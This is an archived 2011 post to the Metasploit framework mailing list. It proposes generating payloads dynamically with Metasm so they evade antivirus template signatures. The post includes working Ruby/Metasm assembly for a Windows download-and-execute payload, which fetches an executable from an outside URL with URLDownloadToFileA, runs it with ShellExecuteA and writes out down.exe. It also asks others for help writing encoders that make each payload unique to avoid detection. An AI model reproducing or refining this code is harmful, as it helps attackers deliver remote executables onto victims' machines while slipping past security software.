[framework] Payload AV evasion thoughts...

John B johnb.electric at gmail.com
Mon Apr 18 08:09:17 CDT 2011

I brought up this idea a few months ago on the mailing list but there might
be some more interest in it now.  The idea is to use Metasm to dynamically
create payloads instead of using the base template.  I've been able to
produce a portable (XP-7) message box payload that is assembled on the fly,
but I don't have enough ASM experience to make it unique meaning if two
people use the same title and msg string then the payloads would be
identical. I've seen some work in the framework with Metasm created encoders
for Mips<https://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/encoders/mipsbe/longxor.rb>
outside the framework with a smiley
encoder<http://www.cr0.org/misc/smile.rb>for IM exploits.

Heres an example of how a basic download execute payload would look like
(example only probably not the most AV evasive way):


require 'metasm'

pe = Metasm::PE.assemble Metasm::Ia32.new, <<EOS


push 0
push 0
push PATH
push URL
push 0
call download

push 0
push 0
push 0
push PATH
push CMD
push 0
call execute


.import 'shell32' ShellExecuteA execute
.import 'urlmon' URLDownloadToFileA download


URL db "http://someaddress.com/download/hellow.exe
<http://imperiumsec.com/download/hellow.exe>", 0
PATH db "c:/users/john/testd.exe",0
CMD db "open",0


pe.encode_file 'down.exe'

///////end code

Combine that with code to make it portable across all systems then add
a encoding stub and we can create unique payloads every time with out
the need for templates (with the assumption that the templates are the
main way of detecting payloads).

I will continue to work on some full examples but anyone with asm
experience who could create some dynamic encoders with Metasm would
really be helpful.

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://dev.metasploit.com/pipermail/framework/attachments/20110418/0e9e9ab1/attachment.html>

More information about the framework mailing list